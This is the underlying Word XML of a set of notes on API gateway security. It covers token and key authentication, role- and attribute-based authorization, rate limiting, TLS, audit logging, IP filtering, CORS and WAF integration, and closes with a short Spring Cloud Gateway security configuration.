    <w:p w14:paraId="012869F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nd OpenID Connect (OIDC)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674F76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an external Identity Provider (IdP) like </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Auth0</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Okt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Keycloak</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to authenticate users. The API Gateway verifies the JWT (JSON Web Token) sent with the request to validate the identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5042F9E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an extract the token from the HTTP header, validate it, and forward the request to the respective microservice if the token is valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347960E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cases where the token is missing or invalid, the API Gateway can reject the request with a </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>401 Unauthorized</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F87339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Key Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D21D9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API keys for service-to-service communication or client-to-gateway communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C6E50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hecks if the API key is valid and authorized to access specific endpoints or services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344C309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asic Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F16A9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simple use cases, the gateway can handle basic authentication by checking the Authorization header (which contains the base64-encoded username and password) against a list of credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D93439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ssion-Based Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45944FF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using session-based authentication (like in web applications), the API Gateway can verify the session by checking the session ID stored in cookies or headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CDAB3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DAF798">
          <v:rect id="_x0000_i3006" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D9A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Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569C15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orization is the process of ensuring that the authenticated user has the proper permissions to access specific resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE1DB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e-Based Access Control (RBAC)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA667B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roles</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to determine which actions a user or service can perform. For example, a user with the role "ADMIN" can access all resources, while a user with the role "USER" can only access a subset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE6D74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handle the checking of roles and permissions for each request and deny unauthorized access (e.g., returning a </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>403 Forbidden</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> response).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDD0D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ttribute-Based Access Control (ABAC)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4D01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more fine-grained authorization, you can implement </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ABAC</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where access control decisions are based on attributes like user role, location, or time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773BAD8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477CD7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xtract roles or permissions from the </w:t>
      </w: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 xml:space="preserve"> (which might include user roles, access rights, etc.) and enforce these permissions on API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B54F02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595ADC">
          <v:rect id="_x0000_i3007" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="248E4E6E"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Rate Limiting and Throttling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02639D4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o prevent abuse and ensure fair usage, it's important to </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>limit the number of requests</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can be made by a client in a given period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4295023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Gateway Rate Limiting</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69838B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nforce rate limiting by limiting the number of requests from a client (based on </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>I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API Key</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User</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.) within a specified time window (e.g., 1000 requests per hour).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767A0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is prevents </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Denial of Service (DoS)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks or abuse and ensures that one client doesn’t consume too many resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43824E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hrottling</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7914D65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client exceeds the rate limit, the API Gateway can throttle the requests by returning </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>429 Too Many Requests</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> status codes until the client is allowed to send requests again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F70EF8D"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F7F30">
          <v:rect id="_x0000_i3008" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA2C39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4. TLS/SSL Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71359F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Ensure that data transmitted between the client and the API Gateway is encrypted using </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TLS (Transport Layer Security)</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SL (Secure Sockets Layer)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31383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TTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CBE5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HTTPS (secured via SSL/TLS certificates) to encrypt requests between the client and the API Gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3411F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traffic must be encrypted to protect sensitive data from being exposed during transit (e.g., passwords, tokens).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA24CC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nd-to-End Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6962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additional security, especially when sensitive data is being passed from the API Gateway to microservices, consider implementing </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>end-to-end encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the entire communication path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F04AD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F4966">
          <v:rect id="_x0000_i3009" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="157473B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5. Audit and Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8760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dit logging helps in tracing security-related incidents and understanding who accessed what data and when.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777DF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BE39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log requests, including headers, request bodies, and response codes, for security auditing purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179F397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se logs should contain relevant information such as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timestam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status code</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user identity</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to facilitate identifying malicious or unauthorized access attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526CFF6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dit Trails</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8EAC1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n audit trail is critical to track and store security-relevant events and activities for compliance purposes and investigating security incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6DE05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FBCA7">
          <v:rect id="_x0000_i3010" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2844B44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6. IP Whitelisting/Blacklisting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC53B5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estrict access based on the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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F819AB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hitelisting</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A196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ow requests only from specific IP addresses or ranges. This can be useful for securing internal APIs that should only be accessed by specific trusted clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA8165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lacklisting</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676E208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Block access from known malicious IP addresses or ranges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E2F73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50A0B">
          <v:rect id="_x0000_i3011" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C32015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7. Cross-Origin Resource Sharing (CORS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35697D8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RS is essential when handling </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cross-origin requests</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (when a client from one origin tries to access resources hosted on a different origin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B029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ing CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7972C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enforce CORS policies to allow or restrict cross-origin requests to services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5734AE6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instance, only allow requests from certain trusted origins and reject others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B149B0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7F0463">
          <v:rect id="_x0000_i3012" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="008B8E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8. Web Application Firewall (WAF) Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F5A1A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tegrate a </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Web Application Firewall (WAF)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the API Gateway level to monitor and filter HTTP requests to protect services from common threats such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E46B7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QL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A04B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ross-site scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033209F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stributed Denial of Service (DDoS) attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B59C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D8333E">
          <v:rect id="_x0000_i3013" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F355AD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9. API Gateway Security Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE9E70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Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1451E9D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validate </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JWT tokens</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on behalf of the microservices to authenticate users and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2584AA3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token is invalid or expired, the gateway can reject the request early, saving time and resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82899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uthorization</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E4897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 xml:space="preserve"> for authorization and integrate with an </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OAuth 2.0 Authorization Server</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This allows the API Gateway to act as an OAuth resource server to authenticate tokens and authorize access based on scopes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317A9BE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328CDF">
          <v:rect id="_x0000_i3014" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BCE36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Configuration (Spring Cloud Gateway with Security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D06D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figuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AC3B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SecurityConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7FDFB3" w14:textId="77777777" w:rsidR="00D056EB" w:rsidRPr="008B3EF9" w:rsidRDefault="00D056EB" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B5ABE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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B90502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ecurityWebFilterChain securityWebFilterChain(ServerHttpSecurity http) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A609BF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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074C8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csrf().disable()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDE9E6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horizeExchange()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236EF37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public/**").permitAll()  // Open endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727FCCB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secure/**").authenticated()  // Secure endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDE4FB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            .and()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA41BD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oauth2Login();  // OAuth 2.0 login for authentication via Identity Provider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CC8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http.build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D237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2F9612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B5D01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is configuration, the API Gateway will allow unauthenticated access to public endpoints and require authentication for secure endpoints using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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1E6E7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2F517">
          <v:rect id="_x0000_i3015" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8138A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3468367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ey security concerns to handle in the API Gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBDB46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hentication</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thorization</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using JWT, OAuth2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BEA55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ate Limit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Throttling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D8DC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LS/SSL Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8A77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dit Trails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0EF86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RS</w:t>
      </w:r>
